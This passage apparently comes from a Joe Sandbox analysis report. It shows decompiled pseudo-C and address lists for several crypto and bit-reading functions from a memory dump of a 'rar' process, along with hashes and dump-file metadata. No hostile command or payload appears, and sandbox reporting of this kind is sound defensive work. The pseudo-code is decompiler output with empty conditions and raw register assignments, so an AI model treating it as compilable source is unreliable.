				asm("movdqa xmm3, xmm7");
				asm("pand xmm3, [0x2ec6f]");
				asm("inc cx");
				asm("pshufb xmm0, xmm4");
				asm("pshufb xmm1, xmm3");
				asm("psrlw xmm6, 0x4");
				asm("pshufb xmm5, xmm6");
				asm("pshufb xmm2, xmm6");
				asm("pxor xmm5, xmm0");
				asm("psrlw xmm7, 0x4");
				asm("movdqa xmm0, [ebp-0x49]");
				asm("pxor xmm5, xmm1");
				asm("movdqa xmm1, [ebp-0x19]");
				asm("pshufb xmm0, xmm7");
				asm("pshufb xmm1, xmm3");
				asm("pxor xmm5, xmm0");
				asm("movdqa xmm0, [ebp-0x29]");
				asm("pshufb xmm0, xmm4");
				asm("pxor xmm2, xmm0");
				asm("movdqa xmm0, [ebp-0x9]");
				asm("pshufb xmm0, xmm7");
				asm("pxor xmm2, xmm1");
				asm("pxor xmm2, xmm0");
				asm("movdqa xmm0, xmm5");
				asm("punpcklbw xmm0, xmm2");
				asm("pxor xmm0, [ecx-0x10]");
				asm("punpckhbw xmm5, xmm2");
				asm("pxor xmm5, [ecx]");
				asm("movdqu [ecx-0x10], xmm0");
				asm("movdqu [ecx], xmm5");
				if (__r12 - _t162 + _t162 + 0x30 - _t154 <= 0) goto 0x50b56625;
				_t125 = _t139 - _t154;
				if (_t125 >= 0) goto 0x50b5675d;
				 *(_t162 + _t139) =  *(_t162 + _t139) ^  *( *__rcx + __rdx * 4) & 0x0000ffff;
				if (_t125 != 0) goto 0x50b56737;
				goto 0x50b56763;
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ebp");
				return 0;
			}












                                                                                                            0x7ff650b564f4
                                                                                                            0x7ff650b564f4
                                                                                                            0x7ff650b564f7
                                                                                                            0x7ff650b564fb
                                                                                                            0x7ff650b564ff
                                                                                                            0x7ff650b56503
                                                                                                            0x7ff650b5650c
                                                                                                            0x7ff650b5650c
                                                                                                            0x7ff650b56517
                                                                                                            0x7ff650b5651e
                                                                                                            0x7ff650b56525
                                                                                                            0x7ff650b56529
                                                                                                            0x7ff650b56536
                                                                                                            0x7ff650b56543
                                                                                                            0x7ff650b56549
                                                                                                            0x7ff650b5654e
                                                                                                            0x7ff650b56556
                                                                                                            0x7ff650b56559
                                                                                                            0x7ff650b56560
                                                                                                            0x7ff650b56564
                                                                                                            0x7ff650b56567
                                                                                                            0x7ff650b56567
                                                                                                            0x7ff650b56579
                                                                                                            0x7ff650b56585
                                                                                                            0x7ff650b5659b
                                                                                                            0x7ff650b565a7
                                                                                                            0x7ff650b565bd
                                                                                                            0x7ff650b565c9
                                                                                                            0x7ff650b565e1
                                                                                                            0x7ff650b565ed
                                                                                                            0x7ff650b565f8
                                                                                                            0x7ff650b565fe
                                                                                                            0x7ff650b56605
                                                                                                            0x7ff650b5660e
                                                                                                            0x7ff650b56618
                                                                                                            0x7ff650b56625
                                                                                                            0x7ff650b5662c
                                                                                                            0x7ff650b56630
                                                                                                            0x7ff650b56636
                                                                                                            0x7ff650b5663a
                                                                                                            0x7ff650b56642
                                                                                                            0x7ff650b56646
                                                                                                            0x7ff650b5664e
                                                                                                            0x7ff650b56653
                                                                                                            0x7ff650b56658
                                                                                                            0x7ff650b5665d
                                                                                                            0x7ff650b56661
                                                                                                            0x7ff650b56666
                                                                                                            0x7ff650b5666a
                                                                                                            0x7ff650b56672
                                                                                                            0x7ff650b56677
                                                                                                            0x7ff650b5667c
                                                                                                            0x7ff650b56680
                                                                                                            0x7ff650b56685
                                                                                                            0x7ff650b56689
                                                                                                            0x7ff650b56691
                                                                                                            0x7ff650b56696
                                                                                                            0x7ff650b5669b
                                                                                                            0x7ff650b566a0
                                                                                                            0x7ff650b566a5
                                                                                                            0x7ff650b566aa
                                                                                                            0x7ff650b566af
                                                                                                            0x7ff650b566b3
                                                                                                            0x7ff650b566b8
                                                                                                            0x7ff650b566bd
                                                                                                            0x7ff650b566c1
                                                                                                            0x7ff650b566c6
                                                                                                            0x7ff650b566cb
                                                                                                            0x7ff650b566d0
                                                                                                            0x7ff650b566d4
                                                                                                            0x7ff650b566d9
                                                                                                            0x7ff650b566de
                                                                                                            0x7ff650b566e2
                                                                                                            0x7ff650b566e7
                                                                                                            0x7ff650b566ec
                                                                                                            0x7ff650b566f0
                                                                                                            0x7ff650b566f4
                                                                                                            0x7ff650b566f8
                                                                                                            0x7ff650b566fc
                                                                                                            0x7ff650b56701
                                                                                                            0x7ff650b56705
                                                                                                            0x7ff650b56709
                                                                                                            0x7ff650b5670e
                                                                                                            0x7ff650b5671d
                                                                                                            0x7ff650b56723
                                                                                                            0x7ff650b56726
                                                                                                            0x7ff650b5674f
                                                                                                            0x7ff650b5675b
                                                                                                            0x7ff650b5675f
                                                                                                            0x7ff650b5677b
                                                                                                            0x7ff650b56780
                                                                                                            0x7ff650b56785
                                                                                                            0x7ff650b56792

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 430c482453688b628ca8958a65de4d1e4feb3fdc23cf954624df5f1c04aea694
                                                                                                            • Instruction ID: 31da9a23d3cc309897347a4e68b0bc83c02d6e705d31f07590dbf0ad089fe4e8
                                                                                                            • Opcode Fuzzy Hash: 430c482453688b628ca8958a65de4d1e4feb3fdc23cf954624df5f1c04aea694
                                                                                                            • Instruction Fuzzy Hash: 7D71063BA24AC68AE7028F3CD4005AC7720EFABB89B459316DF9573715EB31D646C350
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B40E00 Relevance: .2, Instructions: 158COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00007FF67FF650B40E00(intOrPtr __ebx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _t81;
				void* _t89;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				signed int _t115;
				unsigned int _t160;
				long long _t167;
				signed int _t168;
				long long _t169;
				long long _t170;
				long long _t171;
				long long _t172;
				signed long long _t174;
				void* _t198;
				void* _t201;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;

				_t214 = __r9;
				_t198 = __rdx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t174 = __rdx + __rdx;
				_t201 = __rcx;
				 *((intOrPtr*)(__rcx + 0x528)) = __ebx;
				r13d = 0x40000;
				_t81 =  >  ? __edx : r13d;
				 *((intOrPtr*)(__rcx + 0x520)) = _t81;
				 *((intOrPtr*)(__rcx + 0x524)) = _t81 - 1;
				 *((intOrPtr*)(__rcx + 0x530)) = __rdx - 0x211;
				 *((intOrPtr*)(__rcx + 0x52c)) = _t174 - 1;
				E00007FF67FF650B22580( *((intOrPtr*)(__rcx + 0x21558)), __rax, _t174, __rcx + 0x21598, __rcx, __r8);
				r12d = 4;
				_t160 =  *(_t201 + 0x528) >> 1;
				_t167 =  <  ? _t217 - 5 : __rax;
				E00007FF67FF650B69B9C(__rdx, _t214);
				 *((long long*)(_t201 + 0x518)) = _t167;
				_t89 = E00007FF67FF650B69B9C(_t198, _t214);
				 *((long long*)(_t201 + 0x4f0)) = _t167;
				E00007FF67FF650B6C1A0(_t89, 0,  *((intOrPtr*)(_t201 + 0x518)), _t198, _t174 * 4);
				E00007FF67FF650B69B9C(_t198, _t214);
				 *((long long*)(_t201 + 0x4f8)) = _t167;
				E00007FF67FF650B69B9C(_t198, _t214);
				 *((long long*)(_t201 + 0x500)) = _t167;
				E00007FF67FF650B69B9C(_t198, _t214);
				 *((long long*)(_t201 + 0x508)) = _t167;
				_t168 =  <  ? _t217 - 5 : _t167;
				E00007FF67FF650B69B9C(_t198, _t214);
				 *(_t201 + 0x510) = _t168;
				E00007FF67FF650B69B9C(_t198, _t214);
				 *(_t201 + 0x1a5e8) = _t168;
				_t218 = _t217 - 5;
				 *(_t201 + 0x10) = _t168;
				_t169 =  <  ? _t218 : _t168;
				E00007FF67FF650B69B9C(_t198, _t214);
				 *((long long*)(_t201 + 8)) = _t169;
				_t170 =  <  ? _t218 : _t169;
				_t103 = E00007FF67FF650B69B9C(_t198, _t214);
				_t210 = _t174 + 0x111;
				 *((long long*)(_t201 + 0x18)) = _t170;
				_t104 = E00007FF67FF650B6C1A0(_t103, 0,  *((intOrPtr*)(_t201 + 0x4f0)), _t198, _t174 + 0x111);
				r8d = 0x4000;
				_t105 = E00007FF67FF650B6C1A0(_t104, 0,  *((intOrPtr*)(_t201 + 0x4f8)), _t198, _t174 + 0x111);
				r8d = 0x80000;
				_t106 = E00007FF67FF650B6C1A0(_t105, 0,  *((intOrPtr*)(_t201 + 0x500)), _t198, _t210);
				r8d = 0x100000;
				_t107 = E00007FF67FF650B6C1A0(_t106, 0,  *((intOrPtr*)(_t201 + 0x508)), _t198, _t210);
				r8d =  *((intOrPtr*)(_t201 + 0x520));
				E00007FF67FF650B6C1A0(E00007FF67FF650B6C1A0(E00007FF67FF650B6C1A0(_t107, 0,  *(_t201 + 0x510), _t198, _t210 << 2), 0,  *((intOrPtr*)(_t201 + 8)), _t198,  *(_t201 + 0x10) * 0x4838), 0,  *((intOrPtr*)(_t201 + 0x18)), _t198, _t174 * 4);
				_t171 =  <  ? _t218 : _t170;
				E00007FF67FF650B69B9C(_t198, _t214);
				 *((long long*)(_t201 + 0x21348)) = _t171;
				_t115 =  *(_t201 + 0x21558) << 0x11;
				 *(_t201 + 0x21568) = _t115;
				if (_t115 - _t160 <= 0) goto 0x50b41036;
				 *(_t201 + 0x21568) = _t160;
				_t172 =  <  ? _t218 : _t171;
				E00007FF67FF650B69B9C(_t198, _t214);
				 *((long long*)(_t201 + 0x21560)) = _t172;
				if ( *(_t201 + 0x21558) <= 0) goto 0x50b41079;
				E00007FF67FF650B69B58(_t172, _t172);
				 *((long long*)(_t201 + 0x21358 + _t174 * 8)) = _t172;
				if (1 -  *(_t201 + 0x21558) < 0) goto 0x50b4105d;
				E00007FF67FF650B416D4(_t172, _t174, _t201, _t198, _t201, __rbp, _t174 * 4, _t214, _t215, _t216);
				E00007FF67FF650B410B4(0, _t172, _t174, _t201, _t201, _t215, _t216);
				r8d = 0;
				E00007FF67FF650B3F6E8(0, _t174, _t201, _t201);
				return 1;
			}


























                                                                                                            0x7ff650b40e00
                                                                                                            0x7ff650b40e00
                                                                                                            0x7ff650b40e00
                                                                                                            0x7ff650b40e05
                                                                                                            0x7ff650b40e0a
                                                                                                            0x7ff650b40e1f
                                                                                                            0x7ff650b40e23
                                                                                                            0x7ff650b40e26
                                                                                                            0x7ff650b40e2c
                                                                                                            0x7ff650b40e35
                                                                                                            0x7ff650b40e38
                                                                                                            0x7ff650b40e40
                                                                                                            0x7ff650b40e52
                                                                                                            0x7ff650b40e5b
                                                                                                            0x7ff650b40e68
                                                                                                            0x7ff650b40e73
                                                                                                            0x7ff650b40e79
                                                                                                            0x7ff650b40e86
                                                                                                            0x7ff650b40e8d
                                                                                                            0x7ff650b40e99
                                                                                                            0x7ff650b40ea3
                                                                                                            0x7ff650b40eb9
                                                                                                            0x7ff650b40ec0
                                                                                                            0x7ff650b40eca
                                                                                                            0x7ff650b40ed4
                                                                                                            0x7ff650b40edb
                                                                                                            0x7ff650b40ee5
                                                                                                            0x7ff650b40eec
                                                                                                            0x7ff650b40efc
                                                                                                            0x7ff650b40f09
                                                                                                            0x7ff650b40f10
                                                                                                            0x7ff650b40f18
                                                                                                            0x7ff650b40f1f
                                                                                                            0x7ff650b40f26
                                                                                                            0x7ff650b40f30
                                                                                                            0x7ff650b40f3f
                                                                                                            0x7ff650b40f43
                                                                                                            0x7ff650b40f4a
                                                                                                            0x7ff650b40f55
                                                                                                            0x7ff650b40f62
                                                                                                            0x7ff650b40f69
                                                                                                            0x7ff650b40f75
                                                                                                            0x7ff650b40f7a
                                                                                                            0x7ff650b40f7e
                                                                                                            0x7ff650b40f8c
                                                                                                            0x7ff650b40f92
                                                                                                            0x7ff650b40fa0
                                                                                                            0x7ff650b40fa6
                                                                                                            0x7ff650b40fb4
                                                                                                            0x7ff650b40fba
                                                                                                            0x7ff650b40fbf
                                                                                                            0x7ff650b40ff9
                                                                                                            0x7ff650b41008
                                                                                                            0x7ff650b4100f
                                                                                                            0x7ff650b41014
                                                                                                            0x7ff650b41021
                                                                                                            0x7ff650b41024
                                                                                                            0x7ff650b4102c
                                                                                                            0x7ff650b4102e
                                                                                                            0x7ff650b41040
                                                                                                            0x7ff650b41047
                                                                                                            0x7ff650b4104e
                                                                                                            0x7ff650b4105b
                                                                                                            0x7ff650b41062
                                                                                                            0x7ff650b41067
                                                                                                            0x7ff650b41077
                                                                                                            0x7ff650b4107c
                                                                                                            0x7ff650b41086
                                                                                                            0x7ff650b4108b
                                                                                                            0x7ff650b41093
                                                                                                            0x7ff650b410b2

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b3878210bf52f5f8518f166fa52680d4707b402ea259205d5ee4276fd9063981
                                                                                                            • Instruction ID: e38053f285d2e6e2dff22ccafbd6be9c801f9216aa2f7559158119f0cf47ec93
                                                                                                            • Opcode Fuzzy Hash: b3878210bf52f5f8518f166fa52680d4707b402ea259205d5ee4276fd9063981
                                                                                                            • Instruction Fuzzy Hash: 8C619231A04A8693EB18EB66B8853EE7395FB8A740F484039DB9FD7352DE3DE1418744
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B59714 Relevance: .1, Instructions: 143COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E00007FF67FF650B59714(long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi) {
				unsigned int _t68;
				void* _t93;
				signed long long _t94;
				signed long long _t95;
				void* _t98;
				void* _t115;
				signed long long _t116;
				intOrPtr* _t118;
				void* _t119;
				unsigned int* _t123;
				unsigned int* _t124;

				_t93 = _t115;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				 *((long long*)(_t93 + 0x20)) = __rdi;
				_t116 = _t115 - 0x140;
				_t94 =  *0x50b978f0; // 0x27db226282f1
				_t95 = _t94 ^ _t116;
				 *(_t93 - 0x68 + 0x30) = _t95;
				 *((long long*)(_t116 + 0x20)) = __rcx;
				_t118 = _t116 + 0x30;
				asm("bswap eax");
				 *_t118 =  *((intOrPtr*)(_t95 + __rcx + 0x28));
				_t119 = _t118 + 4;
				if (1 - 0x10 < 0) goto 0x50b59756;
				_t123 = _t116 + 0x68;
				_t68 =  *(_t123 - 0x34);
				r8d = _t68;
				asm("inc ecx");
				_t124 =  &(_t123[1]);
				asm("ror eax, 0x7");
				r8d = r8d ^ _t68;
				r8d = r8d ^ _t68 >> 0x00000003;
				asm("rol eax, 0xd");
				asm("rol ecx, 0xf");
				r8d = r8d + ( *_t123 ^  *_t123 ^  *_t123 >> 0x0000000a);
				r8d = r8d +  *((intOrPtr*)(_t124 - 0x3c));
				r8d = r8d +  *((intOrPtr*)(_t124 - 0x18));
				 *(_t116 + 0x70) = r8d;
				_t98 = __rbx - 1;
				if (1 != 0x10) goto 0x50b59781;
				asm("inc ecx");
				_t19 = _t98 + 0x40; // 0x6f
				r12d = _t19;
				asm("inc ecx");
				asm("movups [esp], xmm0");
				r11d =  *_t116;
				r9d =  *(_t116 + 0xc);
				asm("movups [esp+0x10], xmm1");
				r13d =  *(_t116 + 0x1c);
				r14d =  *(_t116 + 0x18);
				r15d =  *(_t116 + 0x14);
				r10d =  *(_t116 + 0x10);
				r8d = r10d;
				asm("rol eax, 0x7");
				asm("inc ecx");
				r8d = r8d ^ r10d;
				asm("ror eax, 0x6");
				r8d = r8d ^ r10d;
				asm("ror edx, 0xd");
				r8d = r8d + ( !r10d & r14d ^ r15d & r10d);
				r8d = r8d +  *((intOrPtr*)(__rdi + 0x50b854b0));
				r8d = r8d +  *((intOrPtr*)(_t116 + __rdi + 0x30));
				r8d = r8d + r13d;
				r13d = r14d;
				asm("rol eax, 0xa");
				r14d = r15d;
				r15d = r10d;
				r10d = __rcx + _t119;
				asm("ror eax, 0x2");
				r9d =  *(_t116 + 8);
				r11d = __rdx + _t119;
				if (1 != 0x10) goto 0x50b59805;
				 *(_t116 + 0xc) = r9d;
				_t121 =  *((intOrPtr*)(_t116 + 0x20));
				 *(_t116 + 0x10) = r10d;
				 *_t116 = r11d;
				 *(_t116 + 8) =  *(_t116 + 4);
				 *(_t116 + 4) = r11d;
				 *(_t116 + 0x18) = r14d;
				 *(_t116 + 0x14) = r15d;
				 *(_t116 + 0x1c) = r13d;
				 *_t121 =  *( *((intOrPtr*)(_t116 + 0x20))) +  *((intOrPtr*)(_t116 -  *((intOrPtr*)(_t116 + 0x20)) +  *((intOrPtr*)(_t116 + 0x20))));
				if (1 != 0x10) goto 0x50b598c6;
				return E00007FF67FF650B69D10( *((intOrPtr*)(_t116 -  *((intOrPtr*)(_t116 + 0x20)) +  *((intOrPtr*)(_t116 + 0x20)))), ( *(_t116 + 4) ^  *(_t116 + 8)) & r11d ^  *(_t116 + 4) &  *(_t116 + 8),  *(_t93 - 0x68 + 0x30) ^ _t116);
			}














                                                                                                            0x7ff650b59714
                                                                                                            0x7ff650b59717
                                                                                                            0x7ff650b5971b
                                                                                                            0x7ff650b5971f
                                                                                                            0x7ff650b59730
                                                                                                            0x7ff650b59737
                                                                                                            0x7ff650b5973e
                                                                                                            0x7ff650b59741
                                                                                                            0x7ff650b59747
                                                                                                            0x7ff650b5974f
                                                                                                            0x7ff650b59764
                                                                                                            0x7ff650b59766
                                                                                                            0x7ff650b59769
                                                                                                            0x7ff650b59770
                                                                                                            0x7ff650b5977c
                                                                                                            0x7ff650b59781
                                                                                                            0x7ff650b59785
                                                                                                            0x7ff650b5978d
                                                                                                            0x7ff650b59791
                                                                                                            0x7ff650b59798
                                                                                                            0x7ff650b5979b
                                                                                                            0x7ff650b597a0
                                                                                                            0x7ff650b597a3
                                                                                                            0x7ff650b597ab
                                                                                                            0x7ff650b597b2
                                                                                                            0x7ff650b597b5
                                                                                                            0x7ff650b597b9
                                                                                                            0x7ff650b597bd
                                                                                                            0x7ff650b597c4
                                                                                                            0x7ff650b597c8
                                                                                                            0x7ff650b597ca
                                                                                                            0x7ff650b597ce
                                                                                                            0x7ff650b597ce
                                                                                                            0x7ff650b597d2
                                                                                                            0x7ff650b597d7
                                                                                                            0x7ff650b597e3
                                                                                                            0x7ff650b597e7
                                                                                                            0x7ff650b597ec
                                                                                                            0x7ff650b597f1
                                                                                                            0x7ff650b597f6
                                                                                                            0x7ff650b597fb
                                                                                                            0x7ff650b59800
                                                                                                            0x7ff650b59808
                                                                                                            0x7ff650b5980b
                                                                                                            0x7ff650b59811
                                                                                                            0x7ff650b59817
                                                                                                            0x7ff650b59823
                                                                                                            0x7ff650b59826
                                                                                                            0x7ff650b59829
                                                                                                            0x7ff650b5983b
                                                                                                            0x7ff650b59840
                                                                                                            0x7ff650b59846
                                                                                                            0x7ff650b5984f
                                                                                                            0x7ff650b59858
                                                                                                            0x7ff650b5985b
                                                                                                            0x7ff650b5985e
                                                                                                            0x7ff650b59863
                                                                                                            0x7ff650b59869
                                                                                                            0x7ff650b5986d
                                                                                                            0x7ff650b59870
                                                                                                            0x7ff650b59882
                                                                                                            0x7ff650b5988a
                                                                                                            0x7ff650b59890
                                                                                                            0x7ff650b59899
                                                                                                            0x7ff650b598a6
                                                                                                            0x7ff650b598ab
                                                                                                            0x7ff650b598af
                                                                                                            0x7ff650b598b3
                                                                                                            0x7ff650b598b7
                                                                                                            0x7ff650b598bc
                                                                                                            0x7ff650b598c1
                                                                                                            0x7ff650b598ca
                                                                                                            0x7ff650b598d5
                                                                                                            0x7ff650b59903

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1c9946abdfbb66eedf4f60e53ab43e18b1de0d97ab352f25204612af06553932
                                                                                                            • Instruction ID: 11972e4a20ffc9eac5acd9f3b92e0c6fc1ae04a58106705bd788da65e430cbf9
                                                                                                            • Opcode Fuzzy Hash: 1c9946abdfbb66eedf4f60e53ab43e18b1de0d97ab352f25204612af06553932
                                                                                                            • Instruction Fuzzy Hash: 6751E4777287909BD754CF2AE44099E73A0F388784F41912AEE8A93B14DF39E955CF80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B61FAC Relevance: .1, Instructions: 141COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E00007FF67FF650B61FAC(void* __esp, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r9, void* __r10, long long _a8, long long _a16, long long _a24) {
				void* _v24;
				char _v72;
				unsigned int _t87;
				signed int _t92;
				void* _t100;
				signed int _t101;
				void* _t114;
				void* _t116;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t126;
				unsigned int _t127;
				unsigned int _t128;
				intOrPtr _t129;
				void* _t130;
				unsigned int _t141;

				_t114 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t116 = __rcx;
				_t141 =  *(__rcx + 8);
				_t126 =  *((intOrPtr*)(__rcx + 0x18));
				r10d =  *(__rcx + 0xc);
				r9d =  *(_t141 + _t126 + 1) & 0x000000ff;
				r9d = r9d | ( *(_t141 + _t126) & 0x000000ff) << 0x00000008;
				r9d = r9d << 8;
				r9d = r9d |  *(_t141 + _t126 + 2) & 0x000000ff;
				r9d = r9d >> 8 - r10d;
				r9d = r9d >> 8;
				r15d = r9b & 0xffffffff;
				r10d = r10d + 8;
				r9d = r10d;
				r9d = r9d >> 3;
				r9d = r9d + r11d;
				 *(__rcx + 8) = r9d;
				r10d = r10d & 0x00000007;
				 *(__rcx + 0xc) = r10d;
				if ((r15d & 0x00000007) + 1 != 7) goto 0x50b62068;
				_t127 = r9d;
				_t119 =  *((intOrPtr*)(__rcx + 0x18));
				r8d =  *(_t119 + _t127 + 1) & 0x000000ff;
				r8d = r8d | ( *(_t119 + _t127) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *(_t119 + _t127 + 2) & 0x000000ff;
				_t20 = _t130 + 1; // 0x3bc5
				r8d = r8d >> _t20 - r10d;
				r8d = r8d >> 8;
				_t100 = (r8b & 0xffffffff) + 7;
				goto 0x50b620a0;
				if (_t100 != 8) goto 0x50b620b1;
				_t128 = r9d;
				_t120 =  *((intOrPtr*)(__rcx + 0x18));
				r8d =  *(_t120 + _t128 + 1) & 0x000000ff;
				r8d = r8d | ( *(_t120 + _t128) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *(_t120 + _t128 + 2) & 0x000000ff;
				r8d = r8d >> _t100 - r10d;
				_t101 = r8w & 0xffffffff;
				_t87 = __r10 + 0x10;
				 *(__rcx + 0xc) = _t87 & 0x00000007;
				 *(__rcx + 8) = (_t87 >> 3) + r9d;
				if (_t101 != 0) goto 0x50b620be;
				goto 0x50b6216b;
				E00007FF67FF650B11344(__rax,  &_v72);
				if (_t101 == 0) goto 0x50b6214a;
				if ( *(__rcx + 8) -  *((intOrPtr*)(__rcx + 0xe8)) - 1 < 0) goto 0x50b620f6;
				E00007FF67FF650B62D28( *(__rcx + 8) -  *((intOrPtr*)(__rcx + 0xe8)) - 1, __rcx, __rcx);
				if (0 != 0) goto 0x50b620f6;
				_t35 = _t130 - 1; // 0x3bc3
				if (0 - _t35 < 0) goto 0x50b6215e;
				_t129 =  *((intOrPtr*)(_t116 + 8));
				_t123 =  *((intOrPtr*)(_t116 + 0x18));
				r8d =  *(_t129 + _t123) & 0x000000ff;
				r8d = r8d << 8;
				r8d = r8d |  *(_t129 + _t123 + 1) & 0x000000ff;
				r8d = r8d << 8;
				r8d = r8d |  *(_t129 + _t123 + 2) & 0x000000ff;
				r8d = r8d >> 8 -  *(_t116 + 0xc);
				r8d = r8d >> 8;
				 *(_t114 + _v72) = r8b;
				_t92 =  *(_t116 + 0xc) + 8;
				 *((intOrPtr*)(_t116 + 8)) =  *((intOrPtr*)(_t116 + 8)) + (_t92 >> 3);
				 *(_t116 + 0xc) = _t92 & 0x00000007;
				if (1 - _t101 < 0) goto 0x50b620d6;
				r9d = _t101;
				E00007FF67FF650B5DD2C(r15d, _t101, __esp, _t116, _t116, _v72, __r9);
				sil = 0;
				E00007FF67FF650B11534( &_v72);
				return sil;
			}




















                                                                                                            0x7ff650b61fac
                                                                                                            0x7ff650b61fac
                                                                                                            0x7ff650b61fb1
                                                                                                            0x7ff650b61fb6
                                                                                                            0x7ff650b61fc4
                                                                                                            0x7ff650b61fc7
                                                                                                            0x7ff650b61fcb
                                                                                                            0x7ff650b61fcf
                                                                                                            0x7ff650b61fd3
                                                                                                            0x7ff650b61fe1
                                                                                                            0x7ff650b61fe4
                                                                                                            0x7ff650b61fee
                                                                                                            0x7ff650b61ff9
                                                                                                            0x7ff650b61ffc
                                                                                                            0x7ff650b62000
